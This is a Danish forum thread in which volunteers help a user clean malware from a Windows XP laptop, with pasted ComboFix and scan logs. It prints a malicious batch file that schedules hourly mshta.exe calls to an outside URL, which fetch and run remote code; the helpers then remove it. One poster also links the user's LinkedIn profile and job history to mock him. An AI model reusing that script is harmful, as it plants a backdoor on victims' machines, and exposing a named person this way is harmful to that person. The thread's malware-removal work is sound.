[7] 2008-04-14 . 93EA8D04EC73A85DB02EB8805988F733 . 361344 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\tcpip.sys

• 2008-07-07 20:26 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . c:\windows\system32\es.dll
  

• 2008-07-07 20:26 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . c:\windows\system32\dllcache\es.dll
  

• 2008-07-07 20:23 . F17F6226BDC0CD5F0BEF0DAF84D29BEC . 253952 . . [2001.12.4414.706] . . c:\windows\$hf_mig$\KB950974\SP3QFE\es.dll
  

[7] 2008-04-14 12:00 . 19A799805B24990867B00C120D300C3A . 246272 . . [2001.12.4414.701] . . c:\windows\$NtUninstallKB950974$\es.dll

• 2009-03-21 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781] . . c:\windows\system32\kernel32.dll
  

• 2009-03-21 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781] . . c:\windows\system32\dllcache\kernel32.dll
  

• 2009-03-21 . DA11D9D6ECBDF0F93436A4B7C13F7BEC . 991744 . . [5.1.2600.5781] . . c:\windows\$hf_mig$\KB959426\SP3QFE\kernel32.dll
  

[7] 2008-04-14 . C24B983D211C34DA8FCC1AC38477971D . 989696 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB959426$\kernel32.dll

• 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\mswsock.dll
  

• 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\mswsock.dll
  

• 2008-06-20 . FCEE5FCB99F7C724593365C706D28388 . 245248 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\mswsock.dll
  

[7] 2008-04-14 . B4138E99236F0F57D4CF49BAE98A0746 . 245248 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\mswsock.dll
.
(((((((((((((((((((((((((((((((((((((  Reg Loading Points  ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-03-27 39408]
"MSMSGS"="c:\program files\Messenger\msmsgs.exe" [2008-04-14 1695232]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-07-09 148888]
"EDS"="c:\program files\Samsung\Samsung EDS\EDSAgent.exe" [2007-12-21 659456]
"Chrome3"="c:\program files\s3graphics\chrome3\Chrome3.exe" [2009-04-30 1274368]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2008-08-28 1044480]
"SUPBackGround"="c:\program files\Samsung\Samsung Update Plus\SUPBackGround.exe" [2008-12-04 298664]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2008-06-12 34672]
"BatteryManager"="c:\program files\Samsung\Samsung Battery Manager\BatteryManager.exe" [2008-11-27 2768896]
"DMHotKey"="c:\program files\Samsung\Easy Display Manager\DMLoader.exe" [2006-12-27 466944]
"MagicKeyboard"="c:\program files\SAMSUNG\MagicKBD\PreMKBD.exe" [2006-05-15 151552]
"mcagent_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2008-10-31 641208]
"UCam_Menu"="c:\program files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" [2008-12-03 218408]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2009-09-04 417792]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-09-08 305440]
"Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.EXE [2008-11-17 17676288]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

c:\documents and settings\Yngve Ralph\Start Menu\Programs\Startup\
OpenOffice.org 3.1.lnk - c:\program files\OpenOffice.org 3\program\quickstart.exe [2009-4-16 384000]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2008-9-17 580200]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\WINDOWS\\system32\\dpvsetup.exe"=
"c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"8085:TCP"= 8085:TCP:ddnsfilter
"53:TCP"= 53:TCP:webserver

R2 DCSHost.exe;DCSHost.exe;c:\documents and settings\All Users\Application Data\DatacardService\DCSHOST.exe [2009-08-05 110592]
R2 DOSMEMIO;MEMIO;c:\windows\system32\MEMIO.SYS [2009-03-27 4300]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2009-03-27 203280]
R2 S3Funkey;S3Funkey;c:\program files\s3graphics\chrome3\S3Funkey.svc [2009-04-30 444416]
R2 S3LoadSv;S3LoadSv;c:\program files\s3graphics\chrome3\s3loadsv.svc [2009-04-30 387072]
R2 yksvc;Marvell Yukon Service;RUNDLL32.EXE ykx32mpcoinst,serviceStartProc --> RUNDLL32.EXE ykx32mpcoinst,serviceStartProc [?]
R3 DNSeFilter;DNSeFilter;c:\windows\system32\drivers\SamsungEDS.SYS [2008-01-15 30208]
R3 S3GIGP;S3GIGP;c:\windows\system32\drivers\S3gIGPm.sys [2009-03-27 581632]
R3 vcrdrx32;VIA MSP Cardreader Host Controller;c:\windows\system32\drivers\vcrdrx32.sys [2009-03-27 90752]
R3 VMC326;Vimicro Camera Service VMC326;c:\windows\system32\drivers\VMC326.sys [2009-03-27 238464]
S1 Filter;Filter;\??\c:\windows\system32\drivers\Filter.sys --> c:\windows\system32\drivers\Filter.sys [?]
S3 hwusbfake;Huawei DataCard USB Fake;c:\windows\system32\drivers\ewusbfake.sys [2009-08-05 102656]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}]
"c:\windows\system32\rundll32.exe" "c:\windows\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
.
Contents of the 'Scheduled Tasks' folder

2009-08-24 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 10:34]

2009-03-27 c:\windows\Tasks\McDefragTask.job
- c:\progra~1\mcafee\mqc\QcConsol.exe [2009-03-27 08:32]

2009-03-27 c:\windows\Tasks\McQcTask.job
- c:\progra~1\mcafee\mqc\QcConsol.exe [2009-03-27 08:32]

2009-09-20 c:\windows\Tasks\User_Feed_Synchronization-{4C2CC653-8D8B-4747-B339-A00CA8CB617E}.job
- c:\windows\system32\msfeedssync.exe [2009-03-08 02:31]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/ig/redirectdomain?brand=SMSN&bmod=SMSN
uInternet Settings,ProxyOverride = *.local
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Send to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send To Bluetooth - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
.
- - - - ORPHANS REMOVED - - - -

HKLM-Run-VTTimer - VTTimer.exe



**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-20 14:01
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ... 

scanning hidden autostart entries ...

scanning hidden files ... 

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S3Funkey]
"ImagePath"="c:\program files\s3graphics\chrome3\s3funkey.svc"

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S3LoadSv]
"ImagePath"="c:\program files\s3graphics\chrome3\s3loadsv.svc"
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'explorer.exe'(2280)
c:\windows\system32\WININET.dll
c:\program files\McAfee\SiteAdvisor\saHook.dll
c:\windows\system32\btmmhook.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\btncopy.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\progra~1\McAfee\MSC\mcmscsvc.exe
c:\progra~1\McAfee.com\Agent\mcagent.exe
c:\progra~1\COMMON~1\McAfee\MNA\McNASvc.exe
c:\program files\Samsung\MagicKBD\MagicKBD.exe
c:\progra~1\COMMON~1\McAfee\McProxy\McProxy.exe
c:\progra~1\McAfee\VIRUSS~1\Mcshield.exe
c:\program files\OpenOffice.org 3\program\soffice.exe
c:\program files\OpenOffice.org 3\program\soffice.bin
c:\program files\McAfee\MPF\MpfSrv.exe
c:\program files\McAfee\MSK\msksrver.exe
c:\progra~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
c:\windows\system32\rundll32.exe
c:\program files\iPod\bin\iPodService.exe
c:\windows\system32\wscntfy.exe
.
**************************************************************************
.
Completion time: 2009-09-20 14:05 - machine was rebooted
ComboFix-quarantined-files.txt  2009-09-20 12:05

Pre-Run: 61 209 530 368 bytes free
Post-Run: 61 144 289 280 bytes free

WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect

274    --- E O F ---    2009-08-26 20:50

Find og upload disse filer hos Jotti eller Virustotal:

c:\windows\system32\drivers\tcpip.sys
c:\windows\system32\es.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\mswsock.dll

http://virusscan.jotti.org/ - http://www.virustotal.com/en/indexf.html

Du skal måske slå vis skjulte filer og mapper til.

Hvis du ikke ved hvordan så se her:
http://www.it-artikler.dk/2008/03/05/vis-skjulte-filer-og-mapper/

Kopier resultatet herind

karise_larry ref #7
hvis programmerne er væk, så er der kun tomme referencer tilbage i reg-db, og disse er lette at fjerne med ccleaner bagefter.
Der er ingen kørende/aktive vira tilbage, og det er formålet.

Det er langt lettere end at skulle stoppe kørende processer og tjenester for at arbejde sig igennem en inficeret maskine.

Ok - det er så en hurtig løsning, der ikke kræver den dybere indsigt - men det er måske en fejl i min metode.

<claes57>: Skal man jo have adgang til en 'ren' PC + skruetrækker + omtalte værktøj ...
Seriøse Scanner programmer (eks nævnte Malwarebytes/Combofix) kan godt finde ud at kvæle evt. kørende processer...

---

Undskyld for 'spam' her i tråden...

Alle fire filer er nu blevet scannet på Jotti's Malware scan, uden at finde noget....alle fik status "found nothing"

#5
Det er ikke alle der "bare lige" kan tage hdd ud af maskinen. Den løsning er sikkert rigtigt god, men det er ikke alle der kan finde ud af det - så den må være til hvis maskinen er voldsom inficeret.

Hvis du er hyppig bruger af Facebook, er det bedst at bruge Firefox, da denne har flere forskellige facebook plugins, der kan blokere applikationer, quiz m.m.

Start hijackthis, klik på "do  a system scan only" og sæt flueben ved linien her under, luk alle vinduer undtaget

Hijackthis og klik på fix checked.

O23 - Service: Marvell Yukon Service (yksvc) - Unknown owner - RUNDLL32.EXE (file missing)

Genstart og fortæl så hvordan computeren kører?

Hvad med disse, det vil nok  være en god ide at fjerne dem også.

c:\windows\bk23567.dat
c:\windows\e323567.dat

Hvad mon der kører her
C:\k48N.bat

bare synd at
http://www.linkedin.com/pub/dir/yngve/ralph
jf
((((((((((((((((((((((((((((((((((((((((  Find3M Report  ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-20 07:55 . 2009-07-09 21:03    --------    d-----w-    c:\documents and settings\LocalService\Application Data\SACore
2009-09-18 21:16 . 2009-08-12 16:24    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Apple Computer
åbenbart er
Currently:
Past: Senior Consultant at IBM; Senior Consultant at IBM Global Business Services; Senior Consultant at IBM Business Consulting Services

der vil jeg da ikke søge hjælp.

@sullep
Tak,den bat fil havde jeg overset

@sir_smokealot
Klik Start, kør/run og kopier følgende ind
notepad C:\k48N.bat
Så skulle der gerne åbne sig en tekst fil
Indholdet af den må du gerne kopiere herind

Hvorfor ikke bare højreklikke på filen og vælge rediger?

@john_stigers
For at minimere risikoen for fejl.

Computeren kör meget bedre nu. Det virker som om den er ved at väre virus fri.

C:\k48N.bat:

@echo off
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 01:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 02:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 03:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 04:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 05:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 06:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 07:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 08:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 09:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 10:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 11:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 12:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 13:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 14:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 15:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 16:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 17:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 18:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 19:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 20:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 21:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 22:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 23:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
exit

Højreklik på skrivebordet og vælg ny->tekstdokument og kopier  indholdet mellem  linierne ind og gem filen som
CFScript.txt

Du skal sikre dig at den ikke kommer til at hedde CFScript.txt.txt


--------------

Killall::
Snapshot::
File::
C:\k48N.bat
c:\windows\bk23567.dat
c:\windows\e323567.dat

--------------

Da Combofix kan konflikte med din antivirus er det vigtigt at du deaktiverer den.

Tag så fat i den nye fil med musen, og før den hen over Combofix-filen, hvorefter du "giver slip" med musen.
http://www.fromsej.saknet.dk/billeder/cfscript.gif


Så skulle Combofix gerne give sig til at arbejde. Muligvis vil den kræve en genstart, hvilket du skal tillade. Du bør ikke klikke på vinduet imens værktøjet kører, idet det kan få din computer til at fryse.
Når Combofix er færdig, og efter det (muligvis) har genstartet, skulle der gerne åbnes en logfil: combofix.txt som ligger her C:\ Combofix txt

Indholdet af denne fil må du gerne lægge herind.

Det var godt vi fik den fil kontrolleret, den skal  slettes >

C:\k48N.bat:

@sullep
Ja, tak for det sullep.
Som du kan se var det også min konklusion.

ComboFix 09-09-18.02 - Yngve Ralph 2009-09-21 10:41:37.2.1 - NTFSx86
Microsoft Windows XP Home Edition  5.1.2600.3.1252.1.1033.18.894.523 [GMT 2:00]
Running from: C:\Documents and Settings\Yngve Ralph\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\Yngve Ralph\Desktop\CFScript.txt
AV: McAfee VirusScan *On-access scanning disabled* (Outdated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Personal Firewall *enabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}

FILE ::
"C:\k48N.bat"
"c:\windows\bk23567.dat"
"c:\windows\e323567.dat"
.

(((((((((((((((((((((((((((((((((((((((  Other Deletions  )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\k48N.bat

.
(((((((((((((((((((((((((  Files Created from 2009-08-21 to 2009-09-21  )))))))))))))))))))))))))))))))
.

2009-09-20 10:07:42 . 2009-09-20 10:07:42    0    d-----w-    C:\Documents and Settings\Yngve Ralph\Application Data\Malwarebytes
2009-09-20 10:07:36 . 2009-09-10 12:54:06    38224    ----a-w-    C:\WINDOWS\system32\drivers\mbamswissarmy.sys
2009-09-20 10:07:34 . 2009-09-20 10:07:34    0    d-----w-    C:\Documents and Settings\All Users\Application Data\Malwarebytes
2009-09-20 10:07:34 . 2009-09-10 12:53:50    19160    ----a-w-    C:\WINDOWS\system32\drivers\mbam.sys
2009-09-20 10:07:33 . 2009-09-20 10:07:41    0    d-----w-    C:\Program Files\Malwarebytes' Anti-Malware
2009-09-20 09:45:22 . 2009-09-20 09:45:27    0    d-----w-    C:\Program Files\CCleaner
2009-09-20 08:44:22 . 2009-09-20 08:44:22    0    d-----w-    C:\Program Files\Trend Micro
2009-09-18 21:27:33 . 2009-09-18 21:27:33    17564    ---ha-w-    C:\WINDOWS\system32\mlfcache.dat
2009-09-18 21:19:30 . 2009-09-18 21:20:37    0    d-----w-    C:\Program Files\Safari
2009-09-18 21:12:25 . 2009-09-18 21:12:25    0    d-----w-    C:\Program Files\iPod
2009-09-18 21:12:17 . 2009-09-18 21:21:54    0    d-----w-    C:\Program Files\iTunes
2009-09-18 21:12:17 . 2009-09-18 21:14:29    0    d-----w-    C:\Documents and Settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
2009-09-18 21:08:19 . 2009-09-18 21:09:40    0    d-----w-    C:\Program Files\QuickTime
2009-09-13 08:45:59 . 2009-09-20 10:16:57    0    d-----w-    C:\Program Files\webserver
2009-08-26 19:48:48 . 2009-08-26 19:53:49    0    d-----w-    C:\Documents and Settings\Yngve Ralph\Application Data\Spotify
2009-08-26 19:48:48 . 2009-08-26 19:49:53    0    d-----w-    C:\Documents and Settings\Yngve Ralph\Local Settings\Application Data\Spotify
2009-08-26 19:48:45 . 2009-08-26 19:48:46    0    d-----w-    C:\Program Files\Spotify

.
((((((((((((((((((((((((((((((((((((((((  Find3M Report  ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-20 07:55:46 . 2009-07-09 21:03:13    0    d-----w-    C:\Documents and Settings\LocalService\Application Data\SACore
2009-09-18 21:16:42 . 2009-08-12 16:24:04    0    d-----w-    C:\Documents and Settings\Yngve Ralph\Application Data\Apple Computer
2009-09-18 21:12:21 . 2009-08-12 16:19:03    0    d-----w-    C:\Program Files\Common Files\Apple
2009-08-28 17:42:52 . 2009-08-12 16:19:49    40448    ----a-w-    C:\WINDOWS\system32\drivers\usbaapl.sys
2009-08-28 17:42:52 . 2009-08-12 16:19:49    2065696    ----a-w-    C:\WINDOWS\system32\usbaaplrc.dll
2009-08-12 16:27:31 . 2009-08-12 16:27:31    17536    ----a-w-    C:\Documents and Settings\Yngve Ralph\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-08-12 16:23:42 . 2009-08-12 16:22:48    0    d-----w-    C:\Documents and Settings\All Users\Application Data\{8CD7F5AF-ECFA-4793-BF40-D8F42DBFF906}
2009-08-12 16:22:48 . 2009-08-12 16:20:32    0    d-----w-    C:\Documents and Settings\All Users\Application Data\Apple Computer
2009-08-12 16:22:17 . 2009-08-12 16:22:17    0    d-----w-    C:\Program Files\Bonjour
2009-08-12 16:20:03 . 2009-08-12 16:20:00    0    d-----w-    C:\Program Files\Apple Software Update
2009-08-12 16:19:03 . 2009-08-12 16:19:03    0    d-----w-    C:\Documents and Settings\All Users\Application Data\Apple
2009-08-11 15:06:14 . 2009-03-27 20:22:15    0    d-----w-    C:\Program Files\McAfee
2009-08-05 10:09:00 . 2009-08-05 10:06:54    0    d-----w-    C:\Program Files\Comviq Surf Connect
2009-08-05 10:09:00 . 2009-08-05 10:06:14    0    d-----w-    C:\Documents and Settings\All Users\Application Data\DatacardService
2009-08-05 09:01:48 . 2009-03-27 18:48:13    204800    ----a-w-    C:\WINDOWS\system32\mswebdvd.dll
2009-07-17 19:01:06 . 2009-03-27 18:48:01    58880    ----a-w-    C:\WINDOWS\system32\atl.dll
2009-07-13 21:43:24 . 2009-03-27 18:48:32    286208    ----a-w-    C:\WINDOWS\system32\wmpdxm.dll
2009-07-09 03:03:47 . 2009-07-09 03:04:16    410984    ----a-w-    C:\WINDOWS\system32\deploytk.dll
2009-07-03 17:09:28 . 2009-03-27 18:48:24    915456    ------w-    C:\WINDOWS\system32\wininet.dll
.

------- Sigcheck -------

• 2008-06-20 11:59:02 . AD978A1B783B5719720CFF204B666C8E . 361600 . . [5.1.2600.5625 (xpsp_sp3_qfe.080620-1309)] . . C:\WINDOWS\$hf_mig$\KB951748\SP3QFE\tcpip.sys
  

• 2008-06-20 11:51:12 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625 (xpsp_sp3_gdr.080620-1249)] . . C:\WINDOWS\system32\dllcache\tcpip.sys
  

• 2008-06-20 11:51:12 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625 (xpsp_sp3_gdr.080620-1249)] . . C:\WINDOWS\system32\drivers\tcpip.sys
  

[7] 2008-04-14 12:00:00 . 93EA8D04EC73A85DB02EB8805988F733 . 361344 . . [5.1.2600.5512 (xpsp.080413-0852)] . . C:\WINDOWS\$NtUninstallKB951748$\tcpip.sys

• 2008-07-07 20:26:58 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . C:\WINDOWS\system32\es.dll
  

• 2008-07-07 20:26:58 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . C:\WINDOWS\system32\dllcache\es.dll
  

• 2008-07-07 20:23:18 . F17F6226BDC0CD5F0BEF0DAF84D29BEC . 253952 . . [2001.12.4414.706] . . C:\WINDOWS\$hf_mig$\KB950974\SP3QFE\es.dll
  

[7] 2008-04-14 12:00:00 . 19A799805B24990867B00C120D300C3A . 246272 . . [2001.12.4414.701] . . C:\WINDOWS\$NtUninstallKB950974$\es.dll

• 2009-03-21 14:06:58 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781 (xpsp_sp3_gdr.090321-1317)] . . C:\WINDOWS\system32\kernel32.dll
  

• 2009-03-21 14:06:58 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781 (xpsp_sp3_gdr.090321-1317)] . . C:\WINDOWS\system32\dllcache\kernel32.dll
  

• 2009-03-21 13:59:23 . DA11D9D6ECBDF0F93436A4B7C13F7BEC . 991744 . . [5.1.2600.5781 (xpsp_sp3_qfe.090321-1341)] . . C:\WINDOWS\$hf_mig$\KB959426\SP3QFE\kernel32.dll
  

[7] 2008-04-14 12:00:00 . C24B983D211C34DA8FCC1AC38477971D . 989696 . . [5.1.2600.5512 (xpsp.080413-2111)] . . C:\WINDOWS\$NtUninstallKB959426$\kernel32.dll

• 2008-06-20 17:46:57 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625 (xpsp_sp3_gdr.080620-1249)] . . C:\WINDOWS\system32\mswsock.dll
  

• 2008-06-20 17:46:57 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625 (xpsp_sp3_gdr.080620-1249)] . . C:\WINDOWS\system32\dllcache\mswsock.dll
  

• 2008-06-20 17:43:05 . FCEE5FCB99F7C724593365C706D28388 . 245248 . . [5.1.2600.5625 (xpsp_sp3_qfe.080620-1309)] . . C:\WINDOWS\$hf_mig$\KB951748\SP3QFE\mswsock.dll
  

[7] 2008-04-14 12:00:00 . B4138E99236F0F57D4CF49BAE98A0746 . 245248 . . [5.1.2600.5512 (xpsp.080413-0852)] . . C:\WINDOWS\$NtUninstallKB951748$\mswsock.dll
.
(((((((((((((((((((((((((((((((((((((  Reg Loading Points  ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-03-27 20:13:01 39408]
"MSMSGS"="C:\Program Files\Messenger\msmsgs.exe" [2008-04-14 13:42:30 1695232]

Den log er lidt kort:) Vil du godt lige sende den en gang til, og denne gang sikre dig at du får det hele med. Jeg har iøvrigt lagt mærke til, at du i samtlige logs vi har set hidtil, har været en dag foran mig?

Havde lidt problmer med Combofix...her en ny log. Datoen er blevet opdateret (efter loggen er skabt)


ComboFix 09-09-18.02 - Yngve Ralph 2009-09-21 15:28.3.1 - NTFSx86
Microsoft Windows XP Home Edition  5.1.2600.3.1252.1.1033.18.894.518 [GMT 2:00]
Running from: c:\documents and settings\Yngve Ralph\Desktop\ComboFix.exe
AV: McAfee VirusScan *On-access scanning disabled* (Outdated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Personal Firewall *enabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}
.

(((((((((((((((((((((((((((((((((((((((  Other Deletions  )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
---- Previous Run -------
.
C:\k48N.bat

.
(((((((((((((((((((((((((  Files Created from 2009-08-21 to 2009-09-21  )))))))))))))))))))))))))))))))
.

